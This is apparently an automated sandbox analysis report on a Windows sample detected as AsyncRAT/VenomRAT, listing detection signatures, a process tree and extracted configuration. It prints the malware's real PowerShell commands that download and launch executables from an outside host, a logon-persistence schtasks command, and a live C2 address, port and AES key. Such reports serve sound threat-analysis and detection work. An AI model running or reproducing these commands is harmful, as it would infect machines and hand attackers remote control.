Windows Analysis Report
ZzOTKK2V8l.exe

Overview

General Information

Sample name: ZzOTKK2V8l.exe (renamed because the original name is a hash value)
Original sample name: c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660.exe
Analysis ID: 1447641
MD5: 9f7b2bf836c0e9682f7f612fc60d88f9
SHA1: 2a99db9697d168488ef962ff51f0599e89bfeaeb
SHA256: c8c12055c4468764fdb8553eee67f51dea7be14e4517d5d43d5a7695dc6b0660
Tags: exe, venomrat

Detection

AsyncRAT, VenomRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Snort IDS alert for network traffic
Yara detected AsyncRAT
Yara detected Powershell download and execute
Yara detected VenomRAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • ZzOTKK2V8l.exe (PID: 6368 cmdline: "C:\Users\user\Desktop\ZzOTKK2V8l.exe" MD5: 9F7B2BF836C0E9682F7F612FC60D88F9)
    • cmd.exe (PID: 6516 cmdline: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2108 cmdline: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4444 cmdline: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5760 cmdline: powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2972 cmdline: powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 1684 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5752 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 4408 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp124D.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 748 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • AntiMalware.exe (PID: 4852 cmdline: "C:\Users\user\AppData\Roaming\AntiMalware.exe" MD5: 9F7B2BF836C0E9682F7F612FC60D88F9)
        • cmd.exe (PID: 6776 cmdline: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2464 cmdline: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 4408 cmdline: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe') MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 3472 cmdline: powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 748 cmdline: powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
  • AntiMalware.exe (PID: 2680 cmdline: C:\Users\user\AppData\Roaming\AntiMalware.exe MD5: 9F7B2BF836C0E9682F7F612FC60D88F9)
    • cmd.exe (PID: 2892 cmdline: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4204 cmdline: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5144 cmdline: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 3292 cmdline: powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 1492 cmdline: powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
Extracted VenomRAT configuration:
{"Server": "94.156.65.172", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "AntiMalware.exe", "AES_key": "jJXnCe880wpEw5c4UGtj4RyhmqzVM1cb", "Mutex": "izslwuidilziewad", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "kqqmqcHW+lrfDFUM+L+OdEMYusuLLkWntK3q1MWb1AnedZMdr2oAlXEGkreKRl0JNVwhdGMQgoNPJLnKDu9Nux3mwulmhQchyeUxqfxX5H8M87MqPLcXnKblAMoa8m+VyRGCVFn59iBwizEj16DMiLuv1h27Dkx3yjZaVlktefI=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}
Extracted AsyncRAT configuration:
{"Ports": ["4449"], "Server": ["94.156.65.172"], "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "Server Signature": "kqqmqcHW+lrfDFUM+L+OdEMYusuLLkWntK3q1MWb1AnedZMdr2oAlXEGkreKRl0JNVwhdGMQgoNPJLnKDu9Nux3mwulmhQchyeUxqfxX5H8M87MqPLcXnKblAMoa8m+VyRGCVFn59iBwizEj16DMiLuv1h27Dkx3yjZaVlktefI="}
Source | Rule | Description | Author | Strings
ZzOTKK2V8l.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
ZzOTKK2V8l.exe | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen
  • 0xfd07:$q1: Select * from Win32_CacheMemory
  • 0xfd47:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0xfd95:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0xfde3:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\AntiMalware.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
C:\Users\user\AppData\Roaming\AntiMalware.exe | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen
  • 0xfd07:$q1: Select * from Win32_CacheMemory
  • 0xfd47:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0xfd95:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0xfde3:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Source | Rule | Description | Author | Strings
00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VenomRAT | Yara detected VenomRAT | Joe Security
Process Memory Space: ZzOTKK2V8l.exe PID: 6368 | JoeSecurity_VenomRAT | Yara detected VenomRAT | Joe Security

Source | Rule | Description | Author | Strings
0.2.ZzOTKK2V8l.exe.36ea760.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
0.2.ZzOTKK2V8l.exe.36ea760.0.unpack | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen
  • 0xdf07:$q1: Select * from Win32_CacheMemory
  • 0xdf47:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0xdf95:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0xdfe3:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.0.ZzOTKK2V8l.exe.600000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
0.0.ZzOTKK2V8l.exe.600000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen
  • 0xfd07:$q1: Select * from Win32_CacheMemory
  • 0xfd47:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0xfd95:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0xfde3:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.2.ZzOTKK2V8l.exe.36ea760.0.raw.unpack | JoeSecurity_VenomRAT | Yara detected VenomRAT | Joe Security
Source | Rule | Description | Author | Strings
amsi64_2108.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_4444.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_4204.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_2464.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_4408.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

System Summary

Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ZzOTKK2V8l.exe", ParentImage: C:\Users\user\Desktop\ZzOTKK2V8l.exe, ParentProcessId: 6368, ParentProcessName: ZzOTKK2V8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit, ProcessId: 1684, ProcessName: cmd.exe
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ZzOTKK2V8l.exe", ParentImage: C:\Users\user\Desktop\ZzOTKK2V8l.exe, ParentProcessId: 6368, ParentProcessName: ZzOTKK2V8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit, ProcessId: 1684, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ZzOTKK2V8l.exe", ParentImage: C:\Users\user\Desktop\ZzOTKK2V8l.exe, ParentProcessId: 6368, ParentProcessName: ZzOTKK2V8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, ProcessId: 6516, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , CommandLine: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , ProcessId: 2108, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro; Data: Command: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , CommandLine: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , ProcessId: 2108, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ZzOTKK2V8l.exe", ParentImage: C:\Users\user\Desktop\ZzOTKK2V8l.exe, ParentProcessId: 6368, ParentProcessName: ZzOTKK2V8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, ProcessId: 6516, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1684, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' , ProcessId: 5752, ProcessName: schtasks.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ZzOTKK2V8l.exe", ParentImage: C:\Users\user\Desktop\ZzOTKK2V8l.exe, ParentProcessId: 6368, ParentProcessName: ZzOTKK2V8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, ProcessId: 6516, ProcessName: cmd.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , CommandLine: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') , ProcessId: 2108, ProcessName: powershell.exe

Data Obfuscation

